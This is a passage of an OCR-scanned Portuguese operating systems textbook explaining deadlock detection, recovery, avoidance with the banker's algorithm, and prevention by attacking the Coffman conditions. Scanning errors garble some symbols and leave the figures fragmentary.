recursos, com É, recursos de classe 1, E, recursos de 
classe 2, e geralmente, E recursos de classe i (1 < i < m). 
E é o vetor de recursos existentes. Ele fornece o 
número total de instâncias de cada recurso existente. 
Por exemplo, se a classe 1 for de unidades de fita, en- 
tão E, = 2 significa que o sistema tem duas unidades 
de fita. 

A qualquer instante, alguns dos recursos são aloca- 
dos e não se encontram disponíveis. Seja 4 o vetor de 
recursos disponíveis, com 4, dando o número de ins- 
tâncias de recurso i atualmente disponíveis (isto é, não 
alocadas). Se ambas as nossas unidades de fita estive- 
rem alocadas, 4, será 0. 

Agora precisamos de dois arranjos, C, a matriz de 
alocação atual e R, a matriz de requisição. A i-ésima 
linha de C informa quantas instâncias de cada classe de 
recurso P, atualmente possui. Desse modo, C, é o nú- 
mero de instâncias do recurso j que são possuidas pelo 
processo i. Similarmente, Ri é o número de instâncias 
do recurso j que P quer. Essas quatro estruturas de da- 
dos são mostradas na Figura 6.6. 

Uma importante condição invariante se aplica a 
essas quatro estruturas de dados. Em particular, cada 


KeA As quatro estruturas de dados necessárias ao 
algoritmo de detecção de impasses. 
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Matriz de requisições 
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Linha 2 informa qual é a 
necessidade do processo 2 


recurso é alocado ou está disponível. Essa observação 
significa que 


2 G+A=E, 


Em outras palavras, se somarmos todas as instâncias 
do recurso j que foram alocadas e a isso adicionarmos 
todas as instâncias que estão disponíveis, o resultado 
será o número de instâncias existentes daquela classe 
de recursos. 

O algoritmo de detecção de impasses é baseado em 
vetores de comparação. Vamos definir a relação 4 < B, 
entre dois vetores 4 e B, para indicar que cada elemento 
de 4 é menor do que ou igual ao elemento correspon- 
dente de B. Matematicamente, 4 < B se mantém se e 
somente se Á, <B paral<i<m. 

Diz-se que cada processo, inicialmente, está desmar- 
cado. À medida que o algoritmo progride, os processos 
serão marcados, indicando que eles são capazes de com- 
pletar e portanto não estão em uma situação de impas- 
se. Quando o algoritmo termina, sabe-se que quaisquer 
processos desmarcados estão em situação de impasse. 
Esse algoritmo presume o pior cenário possível: todos 
os processos mantêm todos os recursos adquiridos até 
que terminem. 

O algoritmo de detecção de impasses pode ser dado 
agora como a seguir. 


1. Procure por um processo desmarcado, P., para o 
qual a i-ésima linha de R seja menor ou igual a 4. 

2. Se um processo assim for encontrado, adicione a 
i-ésima linha de C a A, marque o processo e volte 
ao passo 1. 

3. Se esse processo não existir, o algoritmo termina. 


Quando o algoritmo terminar, todos os processos 
desmarcados, se houver algum, estarão em situação de 
impasse. 

O que o algoritmo está fazendo no passo 1 é procurar 
por um processo que possa ser executado até o fim. Esse 
processo é caracterizado por ter demandas de recursos 
que podem ser atendidas pelos recursos atualmente dis- 
poníveis. O processo escolhido é então executado até 
ser concluído, momento em que ele retorna os recursos 
a ele alocados para o pool de recursos disponíveis. Ele 
então é marcado como concluído. Se todos os processos 
são, em última análise, capazes de serem executados até 
a sua conclusão, nenhum deles está em situação de im- 
passe. Se alguns deles jamais puderem ser concluídos, 
eles estão em situação de impasse. Embora o algorit- 
mo seja não determinístico (pois ele pode executar os 
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processos em qualquer ordem possível), o resultado é 
sempre o mesmo. 

Como um exemplo de como o algoritmo de detecção 
de impasses funciona, observe a Figura 6.7. Aqui temos 
três processos e quatro classes de recursos, os quais ro- 
tulamos arbitrariamente como unidades de fita, plotters, 
scanners e unidades de Blu-ray. O processo 1 tem um 
scanner. O processo 2 tem duas unidades de fitas e uma 
unidade de Blu-ray. O processo 3 tem uma plotter e dois 
scanners. Cada processo precisa de recursos adicionais, 
como mostrado na matriz R. 

Para executar o algoritmo de detecção de impasses, 
procuramos por um processo cuja solicitação de recur- 
sos possa ser satisfeita. O primeiro não pode ser satis- 
feito, pois não há uma unidade de Blu-ray disponível. 
O segundo também não pode ser satisfeito, pois não há 
um scanner liberado. Felizmente, o terceiro pode ser 
satisfeito, de maneira que o processo 3 executa e even- 
tualmente retorna todos os seus recursos, resultando em 


A=(2220) 


Nesse ponto o processo 2 pode executar e retornar os 
seus recursos, resultando em 


A=(4221) 


Agora o restante do processo pode executar. Não há 
um impasse no sistema. 

Agora considere uma variação menor da situação da 
Figura 6.7. Suponha que o processo 3 precisa de uma uni- 
dade de Blu-ray, assim como as duas unidades de fitas e a 
plotter. Nenhuma das solicitações pode ser satisfeita, então 
o sistema inteiro eventualmente estará em uma situação de 
impasse. Mesmo se dermos ao processo 3 suas duas unida- 
des de fitas e uma plotter, o sistema entrará em uma situa- 
ção de impasse quando ele solicitar a unidade de Blu-ray. 


eTEN A Um exemplo para o algoritmo de detecção de 
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Agora que sabemos como detectar impasses (pelo 
menos com solicitações de recursos estáticos conhecidas 
antecipadamente), surge a questão de quando procurar 
por eles. Uma possibilidade é verificar todas as vezes que 
uma solicitação de recursos for feita. Isso é certo que irá 
detectá-las o mais cedo possível, mas é uma alternativa 
potencialmente cara em termos de tempo da CPU. Uma 
estratégia possível é fazer a verificação a cada k minutos, 
ou talvez somente quando a utilização da CPU cair abaixo 
de algum limiar. A razão para considerar a utilização da 
CPU é que se um número suficiente de processos estiver 
em situação de impasse, haverá menos processos executá- 
veis, e a CPU muitas vezes estará ociosa. 


6.4.3 Recuperação de um impasse 


Suponha que nosso algoritmo de detecção de impasses 
teve sucesso e detectou um impasse. O que fazer então? 
Alguma maneira é necessária para recuperar o sistema 
e colocá-lo em funcionamento novamente. Nesta seção 
discutiremos várias maneiras de conseguir isso. Nenhu- 
ma delas é especialmente atraente, no entanto. 


Recuperação mediante preempção 


Em alguns casos pode ser viável tomar temporaria- 
mente um recurso do seu proprietário atual e dá-lo a 
outro processo. Em muitos casos, pode ser necessária 
a intervenção manual, especialmente em sistemas ope- 
racionais de processamento em lote executando em 
computadores de grande porte. 

Por exemplo, para tomar uma impressora a laser de 
seu processo-proprietário, o operador pode juntar todas 
as folhas já impressas e colocá-las em uma pilha. Então o 
processo pode ser suspenso (marcado como não executá- 
vel). Nesse ponto, a impressora pode ser alocada para ou- 
tro processo. Quando esse processo terminar, a pilha de 
folhas impressas pode ser colocada de volta na bandeja de 
saída da impressora, e o processo original reinicializado. 

A capacidade de tirar um recurso de um processo, 
entregá-lo a outro para usá-lo e então devolvê-lo sem 
que o processo note isso é algo altamente dependente da 
natureza do recurso. A recuperação dessa maneira é com 
frequência difícil ou impossível. Escolher o processo a 
ser suspenso depende em grande parte de quais proces- 
sos têm recursos que podem ser facilmente devolvidos. 


Recuperação mediante retrocesso 


Se os projetistas de sistemas e operadores de má- 
quinas souberem que a probabilidade da ocorrência 


de impasses é grande, eles podem arranjar para que os 
processos gerem pontos de salvaguarda (checkpoints) 
periodicamente. Gerar este ponto de salvaguarda de 
um processo significa que o seu estado é escrito para 
um arquivo, para que assim ele possa ser reinicializado 
mais tarde. O ponto de salvaguarda contém não apenas 
a imagem da memória, mas também o estado dos recur- 
sos, em outras palavras, quais recursos estão atualmente 
alocados para o processo. Para serem mais eficientes, 
novos pontos de salvaguarda não devem sobrescrever 
sobre os antigos, mas serem escritos para os arquivos 
novos, de maneira que à medida que o processo execu- 
ta, toda uma sequência se acumula. 

Quando um impasse é detectado, é fácil ver quais re- 
cursos são necessários. Para realizar a recuperação, um 
processo que tem um recurso necessário é retrocedido até 
um ponto no tempo anterior ao momento em que ele ad- 
quiriu aquele recurso, reiniciando em um de seus pontos de 
salvaguarda anteriores. Todo o trabalho realizado desde o 
ponto de salvaguarda é perdido (por exemplo, a produção 
impressa desde o ponto de salvaguarda deve ser descarta- 
da, tendo em vista que ela será impressa novamente). Na 
realidade, o processo é reiniciado para um momento ante- 
rior quando ele não tinha o recurso, que agora é alocado 
para um dos processos em situação de impasse. Se o pro- 
cesso reiniciado tentar adquirir o recurso novamente, terá 
de esperar até que ele se torne disponível. 


Recuperação mediante a eliminação de processos 


A maneira mais bruta de eliminar um impasse, mas 
também a mais simples, é matar um ou mais processos. 
Uma possibilidade é matar um processo no ciclo. Com 
um pouco de sorte, os outros processos serão capazes de 
continuar. Se isso não ajudar, essa ação pode ser repeti- 
da até que o ciclo seja rompido. 

Como alternativa, um processo que não está no ciclo 
pode ser escolhido como vítima a fim liberar os seus re- 
cursos. Nessa abordagem, o processo a ser morto é cui- 
dadosamente escolhido porque ele tem em mãos recursos 
que algum processo no ciclo precisa. Por exemplo, um 
processo pode ter uma impressora e querer uma plotter, 
com outro processo tendo uma plotter e querendo uma 
impressora. Ambos estão em situação de impasse. Um 
terceiro processo pode ter outra impressora idêntica e ou- 
tra plotter idêntica e estar executando feliz da vida. Matar 
o terceiro processo liberará esses recursos e acabará com 
o impasse envolvendo os dois primeiros. 

Sempre que possível, é melhor matar um processo 
que pode ser reexecutado desde o início sem efeitos da- 
nosos. Por exemplo, uma compilação sempre pode ser 


reexecutada, pois tudo o que ela faz é ler um arquivo- 
-fonte e produzir um arquivo-objeto. Se ela for morta 
durante uma execução, a primeira execução não terá 
influência alguma sobre a segunda. 

Por outro lado, um processo que atualiza um ban- 
co de dados nem sempre pode executar uma segunda 
vez com segurança. Se ele adicionar 1 a algum campo 
de uma tabela no banco de dados, executá-lo uma vez, 
matá-lo e então executá-lo novamente adicionará 2 ao 
campo, o que é incorreto. 


6.5 Evitando impasses 


Na discussão da detecção de impasses, presumimos 
tacitamente que, quando um processo pede por recur- 
sos, ele pede por todos eles ao mesmo tempo (a matriz 
R da Figura 6.6). Na maioria dos sistemas, no entanto, 
os recursos são solicitados um de cada vez. O sistema 
precisa ser capaz de decidir se conceder um recurso é 
seguro ou não e fazer a alocação somente quando for. 
Desse modo, surge a questão: existe um algoritmo que 
possa sempre evitar o impasse fazendo a escolha certa o 
tempo inteiro? A resposta é um sim qualificado — po- 
demos evitar impasses, mas somente se determinadas 
informações estiverem disponíveis. Nesta seção exami- 
naremos maneiras de evitar um impasse por meio da 
alocação cuidadosa de recursos. 


6.5.1 Trajetórias de recursos 


Os principais algoritmos para evitar impasses são 
baseados no conceito de estados seguros. Antes de des- 
crevê-los, faremos uma ligeira digressão para examinar 
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o conceito de segurança em uma maneira gráfica e fá- 
cil de compreender. Embora a abordagem gráfica não 
se traduza diretamente em um algoritmo utilizável, ela 
proporciona um bom sentimento intuitivo para a natu- 
reza do problema. 

Na Figura 6.8 vemos um modelo para lidar com 
dois processos e dois recursos, por exemplo, uma im- 
pressora e uma plotter. O eixo horizontal representa 
o número de instruções executadas pelo processo 4. 
O eixo vertical representa o número de instruções exe- 
cutadas pelo processo B. Em J, 0 processo A solicita 
uma impressora; em J, ele precisa de uma plotter. A 
impressora e a plotter são liberadas em J, e Z, respec- 
tivamente. O processo B precisa da plotter de 7, a Z, e a 
impressora, de J, a J,. 

Todo ponto no diagrama representa um estado de 
junção dos dois processos. No início, o estado está em 
p, com nenhum processo tendo executado quaisquer 
instruções. Se o escalonador escolher executar 4 pri- 
meiro, chegamos ao ponto q, no qual 4 executou uma 
série de instruções, mas B não executou nenhuma. No 
ponto q a trajetória torna-se vertical, indicando que o 
escalonador escolheu executar B. Com um único pro- 
cessador, todos os caminhos devem ser horizontais ou 
verticais, jamais diagonais. Além disso, o movimento 
é sempre para o norte ou leste, jamais para o sul ou 
oeste (pois processos não podem voltar atrás em suas 
execuções, é claro). 

Quando A cruza a linha / no caminho de r para s, ele 
solicita a impressora e esta lhe é concedida. Quando B 
atinge o pont o ¢, ele solicita a plotter. 

As regiões sombreadas são especialmente interes- 
santes. A região com linhas inclinadas à direita repre- 
senta ambos os processos tendo a impressora. A regra 
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da exclusão mútua torna impossível entrar essa região. 
Similarmente, a região sombreada no outro sentido re- 
presenta ambos processos tendo a plotter e é igualmente 
impossível. 

Sempre que o sistema entrar no quadrado delimita- 
do por J, e J, nas laterais e Z, e J, na parte de cima e de 
baixo, ele eventualmente entrará em uma situação de 
impasse quando chegar à interseção de I, e Z. Nesse 
ponto, 4 está solicitando a plotter e B, a impressora, 
e ambas já foram alocadas. O quadrado inteiro é in- 
seguro e não deve ser adentrado. No ponto t, a única 
coisa segura a ser feita é executar o processo 4 até ele 
chegar a 7, Além disso, qualquer trajetória para u será 
segura. 

A questão importante a atentarmos aqui é que no 
ponto t, B está solicitando um recurso. O sistema preci- 
sa decidir se deseja concedê-lo ou não. Se a concessão 
for feita, o sistema entrará em uma região insegura e 
eventualmente em uma situação de impasse. Para evitar 
o impasse, B deve ser suspenso até que 4 tenha solicita- 
do e liberado a plotter. 


6.5.2 Estados seguros e inseguros 


Os algoritmos que evitam impasses que estudaremos 
usam as informações da Figura 6.6. A qualquer instante 
no tempo, há um estado atual consistindo de E, 4, Ce R. 
Diz-se de um estado que ele é seguro se existir alguma 
ordem de escalonamento na qual todos os processos pu- 
derem ser executados até sua conclusão mesmo que todos 
eles subitamente solicitem seu número máximo de recur- 
sos imediatamente. É mais fácil ilustrar esse conceito por 
meio de um exemplo usando um recurso. Na Figura 6.9(a) 
temos um estado no qual 4 tem três instâncias do recurso, 
mas talvez precise de até nove instâncias. B atualmente 
tem duas e talvez precise de até quatro no total, mais tarde. 
De modo similar, C também tem duas, mas talvez precise 
de cinco adicionais. Existe um total de 10 instâncias de 
recursos, então com sete recursos já alocados, três ainda 
estão livres. 


KETEJ Demonstração de que o estado em (a) é seguro. 


Possui máximo 


Possui máximo 






(b) 


Possui máximo 





O estado da Figura 6.9(a) é seguro porque exis- 
te uma sequência de alocações que permite que todos 
os processos sejam concluídos. A saber, o escalonador 
pode apenas executar B exclusivamente, até ele pedir e 
receber mais duas instâncias do recurso, levando ao es- 
tado da Figura 6.9(b). Quando B termina, temos o esta- 
do da Figura 6.9(c). Então o escalonador pode executar 
C, levando em consequência à Figura 6.9(d). Quando C 
termina, temos a Figura 6.9(e). Agora 4 pode ter as seis 
instâncias do recurso que ele precisa e também termi- 
nar. Assim, o estado da Figura 6.9(a) é seguro porque 
o sistema, pelo escalonamento cuidadoso, pode evitar 
o impasse. 

Agora suponha que tenhamos o estado inicial mos- 
trado na Figura 6.10(a), mas dessa vez A solicita e rece- 
be outro recurso, gerando a Figura 6.10(b). É possível 
encontrarmos uma sequência que seja garantida que 
funcione? Vamos tentar. O escalonador poderia exe- 
cutar B até que ele pedisse por todos os seus recursos, 
como mostrado na Figura 6.10(c). 

Por fim, B termina e temos o estado da Figura 6.10(d). 
Nesse ponto estamos presos. Temos apenas quatro ins- 
tâncias do recurso disponíveis, e cada um dos proces- 
sos ativos precisa de cinco. Não há uma sequência que 
garanta a conclusão. Assim, a decisão de alocação que 
moveu o sistema da Figura 6.10(a) para a Figura 6.10(b) 
foi de um estado seguro para um inseguro. Executar 4 
ou C em seguida começando na Figura 6.10(b) também 
não funciona. Em retrospectiva, a solicitação de 4 não 
deveria ter sido concedida. 

Vale a pena observar que um estado inseguro não é 
um estado em situação de impasse. Começando na Fi- 
gura 6.10(b), o sistema pode executar por um tempo. Na 
realidade, um processo pode até terminar. Além disso, 
é possível que 4 consiga liberar um recurso antes de 
pedir por mais, permitindo a C que termine e evitando 
inteiramente um impasse. Assim, a diferença entre um 
estado seguro e um inseguro é que a partir de um seguro 
o sistema pode garantir que todos os processos termi- 
narão; a partir de um estado inseguro, nenhuma garantia 
nesse sentido pode ser dada. 


Possui máximo Possui máximo 


Disponível: O 


(d) 





Disponível: 7 


(e) 


ei TAA Demonstração de que o estado em (b) é inseguro. 


Possui máximo 





Disponível: 2 


Disponível: 3 


(a) (b) 


6.5.3 O algoritmo do banqueiro para um único 
recurso 


Um algoritmo de escalonamento que pode evitar 
impasses foi desenvolvido por Dijkstra (1965); ele é 
conhecido como o algoritmo do banqueiro e é uma 
extensão do algoritmo de detecção de impasses dado 
na Seção 3.4.1. Ele é modelado da maneira pela qual 
um banqueiro de uma cidade pequena poderia lidar com 
um grupo de clientes para os quais ele concedeu linhas 
de crédito. (Anos atrás, os bancos não emprestavam di- 
nheiro a não ser que tivessem certeza de que poderiam 
ser ressarcidos.) O que o algoritmo faz é conferir para 
ver se conceder a solicitação leva a um estado inseguro. 
Se afirmativo, a solicitação é negada. Se conceder a so- 
licitação conduz a um estado seguro, ela é levada adian- 
te. Na Figura 6.11(a) vemos quatro clientes, 4, B, Ce 
D, cada um tendo recebido um determinado número 
de unidades de crédito (por exemplo, 1 unidade é 1K 
dólares). O banqueiro sabe que nem todos os clientes 
precisarão de seu crédito máximo imediatamente, en- 
tão ele reservou apenas 10 unidades em vez de 22 para 
servi-los. (Nessa analogia, os clientes são processos, as 
unidades são, digamos, unidades de fita, e o banqueiro é 
o sistema operacional.) 

Os clientes cuidam de seus respectivos negócios, 
fazendo solicitações de empréstimos de tempos em 
tempos (isto é, pedindo por recursos). Em um determi- 
nado momento, a situação é como a mostrada na Figura 


ei: AAE Três estados de alocação de recursos: (a) Seguro. 
(b) Seguro. (c) Inseguro. 


Possui máximo 





Disponível: 10 Disponível: 1 


(a) (b) (c) 


Disponível: 2 
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Possui maximo Possui maximo 





Disponivel: 0 Disponivel: 4 


(c) (d) 


6.11(b). Esse estado é seguro porque restando duas uni- 
dades, o banqueiro pode postergar quaisquer solicita- 
ções exceto as de C, deixando então C terminar e liberar 
todos os seus quatro recursos. Com quatro unidades nas 
mãos, o banqueiro pode deixar D ou B terem as unida- 
des necessárias, e assim por diante. 

Considere o que aconteceria se uma solicitação de 
B por mais uma unidade fosse concedida na Figura 
6.11(b). Teriamos a situação da Figura 6.11(c), que é 
insegura. Se todos os clientes subitamente pedissem por 
seus empréstimos máximos, o banqueiro não poderia 
satisfazer nenhum deles, e teriamos um impasse. Um 
estado inseguro não precisa levar a um impasse, tendo 
em vista que um cliente talvez não precise de toda a 
linha de crédito disponível, mas o banqueiro não pode 
contar com esse comportamento. 

O algoritmo do banqueiro considera cada solicitação 
à medida que ela ocorre, vendo se concedê-la leva a um 
estado seguro. Se afirmativo, a solicitação é concedida; 
de outra maneira, ela é adiada. Para ver se um estado é 
seguro, o banqueiro confere para ver se ele tem recursos 
suficientes para satisfazer algum cliente. Se afirmati- 
vo, presume-se que os empréstimos a esse cliente serão 
ressarcidos, e o cliente agora mais próximo do limite é 
conferido, e assim por diante. Se todos os empréstimos 
puderem ser ressarcidos por fim, o estado é seguro e a 
solicitação inicial pode ser concedida. 


6.5.4 O algoritmo do banqueiro com múltiplos 
recursos 


O algoritmo do banqueiro pode ser generalizado 
para lidar com múltiplos recursos. A Figura 6.12 mostra 
como isso funciona. 

Na Figura 6.12 vemos duas matrizes. A primeira, 
à esquerda, mostra quanto de cada recurso está atual- 
mente alocado para cada um dos cinco processos. 
A matriz à direita mostra de quantos recursos cada 
processo ainda precisa a fim de terminar. Essas matri- 
zes são simplesmente C e R da Figura 6.6. Como no 
caso do recurso único, os processos precisam declarar 


314] | SISTEMAS OPERACIONAIS MODERNOS 


[FIGURA 6.12) O algoritmo do banqueiro com múltiplos recursos. 


E = (6342) 
P = (5322) 
A = (1020) 





Recursos ainda necessários 


Recursos alocados 


suas necessidades de recursos totais antes de executar, 
de maneira que o sistema possa calcular a matriz à di- 
reita a cada instante. 

Os três vetores à direita da figura mostram os re- 
cursos existentes, E, os recursos possuídos, P, e os 
recursos disponíveis, 4, respectivamente. A partir de 
E vemos que o sistema tem seis unidades de fita, três 
plotters, quatro impressoras e duas unidades de Blu- 
-ray. Dessas, cinco unidades de fita, três plotters, duas 
impressoras e duas unidades de Blu-ray estão atual- 
mente alocadas. Esse fato pode ser visto somando-se 
as entradas nas quatro colunas de recursos na matriz à 
esquerda. O vetor de recursos disponíveis é apenas a 
diferença entre o que o sistema tem e o que está atual- 
mente sendo usado. 

O algoritmo para verificar se um estado é seguro 
pode ser descrito agora. 


1. Procure por uma linha, R, cujas necessidades de 
recursos não atendidas sejam todas menores ou 
iguais a 4. Se essa linha não existir, o sistema irá 
em algum momento chegar a um impasse, dado 
que nenhum processo pode executar até o fim 
(presumindo que os processos mantenham todos 
os recursos até sua saída). 

2. Presuma que o processo da linha escolhida so- 
licita todos os recursos que ele precisa (o que é 
garantido que seja possível) e termina. Marque 
esse processo como concluído e adicione todos 
OS seus recursos ao vetor A. 

3. Repita os passos 1 e 2 até que todos os proces- 
sos estejam marcados como terminados (caso em 
que o estado inicial era seguro) ou nenhum pro- 
cesso cujas necessidades de recursos possam ser 
atendidas seja deixado (caso em que o sistema 
não era seguro). 


Se vários processos são elegíveis para serem esco- 
lhidos no passo 1, não importa qual seja escolhido: o 
pool de recursos disponíveis ou fica maior, ou na pior 
das hipóteses, fica o mesmo. 

Agora vamos voltar para o exemplo da Figura 6.12. 
O estado atual é seguro. Suponha que o processo B faça 
agora uma solicitação para a impressora. Essa solicita- 
ção pode ser concedida porque o estado resultante ainda 
é seguro (o processo D pode terminar, e então os proces- 
sos 4 ou E, seguidos pelo resto). 

Agora imagine que após dar a B uma das duas im- 
pressoras restantes, E quer a última impressora. Con- 
ceder essa solicitação reduziria o vetor de recursos 
disponíveis para (1 0 0 0), o que leva a um impasse, por- 
tanto a solicitação de E deve ser negada por um tempo. 

O algoritmo do banqueiro foi publicado pela primei- 
ra vez por Dijkstra em 1965. Desde então, quase todo 
livro sobre sistemas operacionais o descreveu detalha- 
damente. Inúmeros estudos foram escritos a respeito de 
vários de seus aspectos. Infelizmente, poucos autores 
tiveram a audácia de apontar que embora na teoria o 
algoritmo seja maravilhoso, na prática ele é essencial- 
mente inútil, pois é raro que os processos saibam por 
antecipação quais serão suas necessidades máximas de 
recursos. Além disso, o número de processos não é fixo, 
mas dinamicamente variável, à medida que novos usuá- 
rios se conectam e desconectam. Ademais, recursos que 
se acreditava estarem disponíveis podem subitamente 
desaparecer (unidades de fita podem quebrar). Des- 
se modo, na prática, poucos — se algum — sistemas 
existentes usam o algoritmo do banqueiro para evitar 
impasses. Alguns sistemas, no entanto, usam heurísti- 
cas similares aquelas do algoritmo do banqueiro para 
evitar um impasse. Por exemplo, redes podem regular 
o tráfego quando a utilização do buffer atinge um nível 
mais alto do que, digamos, 70% — estimando que os 
30% restantes serão suficientes para os usuários atuais 
completarem o seu serviço e retornarem seus recursos. 


6.6 Prevenção de impasses 


Tendo visto que evitar impasses é algo essencial- 
mente impossível, pois isso exige informações a respei- 
to de solicitações futuras, que não são conhecidas, como 
os sistemas reais os evitam? A resposta é voltar para as 
quatro condições colocadas por Coffman et al. (1971) 
para ver se elas podem fornecer uma pista. Se pudermos 
assegurar que pelo menos uma dessas condições jamais 
seja satisfeita, então os impasses serão estruturalmente 
impossíveis (HAVENDER, 1968). 


6.6.1 Atacando a condição de exclusão mútua 


Primeiro vamos atacar a condição da exclusão mú- 
tua. Se nunca acontecer de um recurso ser alocado ex- 
clusivamente para um único processo, jamais teremos 
impasses. Para dados, o método mais simples é tornar os 
dados somente para leitura, de maneira que os processos 
podem usá-los simultaneamente. No entanto, está igual- 
mente claro que permitir que dois processos escrevam 
na impressora ao mesmo tempo levará ao caos. Utilizar 
a técnica de spooling na impressora, vários processos 
podem gerar saídas ao mesmo tempo. Nesse modelo, o 
único processo que realmente solicita a impressora fisi- 
ca é o daemon de impressão. Dado que o daemon jamais 
solicita quaisquer outros recursos, podemos eliminar o 
impasse para a impressora. 

Se o daemon estiver programado para começar a im- 
primir mesmo antes de toda a produção ter passado pelo 
spool, a impressora pode ficar ociosa se um processo de 
saída decidir esperar várias horas após o primeiro sur- 
to de saída. Por essa razão, daemons são normalmente 
programados para imprimir somente após o arquivo de 
saída completo estar disponível. No entanto, essa deci- 
são em si poderia levar a um impasse. O que aconteceria 
se dois processos ainda não tivessem completado suas 
saídas, embora tivessem preenchido metade do espaço 
disponível de spool com suas saídas? Nesse caso, teri- 
amos dois processos que haveriam terminado parte de 
sua saída, mas não toda, e não poderiam continuar. Ne- 
nhum processo será concluído, então teríamos um im- 
passe no disco. 

Mesmo assim, há um princípio de uma ideia aqui 
que é muitas vezes aplicável. Evitar alocar um recurso 
a não ser que seja absolutamente necessário, e tentar 
certificar-se de que o menor número possível de proces- 
sos possa, realmente, requisitar o recurso. 


6.6.2 Atacando a condição de posse e espera 


A segunda das condições estabelecida por Coffman 
et al. parece ligeiramente mais promissora. Se pudermos 
evitar que processos que já possuem recursos esperem 
por mais recursos, poderemos eliminar os impasses. Uma 
maneira de atingir essa meta é exigir que todos os pro- 
cessos solicitem todos os seus recursos antes de iniciar 
a execução. Se tudo estiver disponível, o processo terá 
alocado para si o que ele precisar e pode então executar 
até o fim. Se um ou mais recursos estiverem ocupados, 
nada será alocado e o processo simplesmente esperará. 

Um problema imediato com essa abordagem é que 
muitos processos não sabem de quantos recursos eles 
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precisarão até começarem a executar. Na realidade, se 
soubessem, o algoritmo do banqueiro poderia ser usa- 
do. Outro problema é que os recursos não serão usados 
de maneira otimizada com essa abordagem. Tome como 
exemplo um processo que lê dados de uma fita de en- 
trada, os analisa por uma hora e então escreve uma fita 
de saída, assim como imprime os resultados em uma 
plotter. Se todos os resultados precisam ser solicitados 
antecipadamente, o processo emperrará a unidade de 
fita de saída e a plotter por uma hora. 

Mesmo assim, alguns sistemas em lote de computa- 
dores de grande porte exigem que o usuário liste todos 
os recursos na primeira linha de cada tarefa. O sistema 
então prealoca todos os recursos imediatamente e não 
os libera até que eles não sejam mais necessários pela 
tarefa (ou no caso mais simples, até a tarefa ser con- 
cluída). Embora esse método coloque um fardo sobre o 
programador e desperdice recursos, ele evita impasses. 

Uma maneira ligeiramente diferente de romper com 
a condição de posse e espera é exigir que um processo 
que solicita um recurso primeiro libere temporariamen- 
te todos os recursos atualmente em suas mãos. Então 
ele tenta, de uma só vez, conseguir todos os recursos de 
que precisa. 


6.6.3 Atacando a condição de não preempção 


Atacar a terceira condição (não preempção) também 
é uma possibilidade. Se a impressora foi alocada a um 
processo e ele está no meio da impressão de sua saída, 
tomar à força a impressora porque uma plotter de que 
esse processo também necessita não está disponível é 
algo complicado na melhor das hipóteses e impossível 
no pior cenário. No entanto, alguns recursos podem ser 
virtualizados para essa situação. Promover o spooling 
da saída da impressora para o disco e permitir que ape- 
nas o daemon da impressora acesse a impressora real 
elimina impasses envolvendo a impressora, embora crie 
o potencial para um impasse sobre o espaço em disco. 
Com discos grandes, no entanto, ficar sem espaço em 
disco é algo improvável de acontecer. 

Entretanto, nem todos os recursos podem ser virtua- 
lizados dessa forma. Por exemplo, registros em bancos 
de dados ou tabelas dentro do sistema operacional de- 
vem ser travados para serem usados e aí encontra-se o 
potencial para um impasse. 


6.6.4 Atacando a condição da espera circular 


Resta-nos apenas uma condição. A espera circular 
pode ser eliminada de várias maneiras. Uma delas é 


gp | SISTEMAS OPERACIONAIS MODERNOS 


simplesmente ter uma regra dizendo que um processo 
tem o direito a apenas um único recurso de cada vez. 
Se ele precisar de um segundo recurso, precisa liberar 
o primeiro. Para um processo que precisa copiar um ar- 
quivo enorme de uma fita para uma impressora, essa 
restrição é inaceitável. 

Outra maneira de se evitar uma espera circular é 
fornecer uma numeração global de todos os recursos, 
como mostrado na Figura 6.13(a). Agora a regra é esta: 
processos podem solicitar recursos sempre que eles qui- 
serem, mas todas as solicitações precisam ser feitas em 
ordem numérica. Um processo pode solicitar primeiro 
uma impressora e então uma unidade de fita, mas ele 
não pode solicitar primeiro uma plotter e então uma 
impressora. 

Com essa regra, o grafo de alocação de recursos ja- 
mais pode ter ciclos. Vamos examinar por que isso é ver- 
dade para o caso de dois processos, na Figura 6.13(b). 
Só pode haver um impasse se A solicitar o recurso j, e B 
solicitar o recurso i. Presumindo que i e j são recursos 
distintos, eles terão números diferentes. Se i > j, então 
A não tem permissão para solicitar j porque este tem or- 
dem menor do que a do recurso já obtido por A. Sei </, 
então B não tem permissão para solicitar i porque este 
tem ordem menor do que a do recurso já obtido por B. 
De qualquer maneira, o impasse é impossível. 

Com mais do que dois processos a mesma lógica se 
mantém. A cada instante, um dos recursos alocados será 
o mais alto. O processo possuindo aquele recurso jamais 
pedirá por um recurso já alocado. Ele finalizará, ou, na 
pior das hipóteses, requisitará até mesmo recursos de 
ordens maiores, todos os quais disponíveis. Em conse- 
quência, ele finalizará e libertará seus recursos. Nesse 
ponto, algum outro processo possuirá o recurso de mais 
alta ordem e também poderá finalizar. Resumindo, exis- 
te um cenário no qual todos os processos finalizam, de 
maneira que não há impasse algum. 

Uma variação menor desse algoritmo é abandonar a 
exigência de que os recursos sejam adquiridos em uma 
sequência estritamente crescente e meramente insistir 
que nenhum processo solicite um recurso de ordem mais 


(SURDO) (a) Recursos ordenados numericamente. 


(b) Um grafo de recursos. 


1. Máquina de fotolito (a) 


2. Impressora 

3. Plotter 

4. Unidade de fita 

5. Unidade de Blu-ray 


baixa do que o recurso que ele já possui. Se um processo 
solicita inicialmente 9 e 10, e então libera os dois, ele 
está efetivamente começando tudo de novo, assim não há 
razão para proibi-lo de agora solicitar o recurso 1. 

Embora ordenar numericamente os recursos elimine 
o problema dos impasses, pode ser impossível encontrar 
uma ordem que satisfaça a todos. Quando os recursos 
incluem entradas da tabela de processos, espaço em dis- 
co para spooling, registros travados de bancos de dados 
e outros recursos abstratos, o número de recursos poten- 
ciais e usos diferentes pode ser tão grande que nenhuma 
ordem teria chance de funcionar. 

Várias abordagens para a prevenção de impasses es- 
tão resumidas na Figura 6.14. 


[cj 57cm) Resumo das abordagens para prevenir impasses. 





Condição Abordagem contra impasses 





Exclusão mútua Usar spool em tudo 





Posse e espera Requisitar todos os recursos necessários 


no início 





Não preempção | Retomar os recursos alocados 





Ordenar numericamente os recursos 


Espera circular 











6.7 Outras questões 


Nesta seção discutiremos algumas questões diversas 
relacionadas com impasses. Elas incluem o travamento 
em duas fases, impasses que não envolvem recursos e 
inanições. 


6.7.1 Travamento em duas fases 


Embora os meios para evitar e prevenir impasses 
não sejam muito promissores em geral, para aplica- 
ções específicas, são conhecidos muitos algoritmos 
excelentes para fins especiais. Como um exemplo, em 
muitos sistemas de bancos de dados, uma operação 
que ocorre frequentemente é solicitar travas em vários 
registros e então atualizar todos os registros travados. 
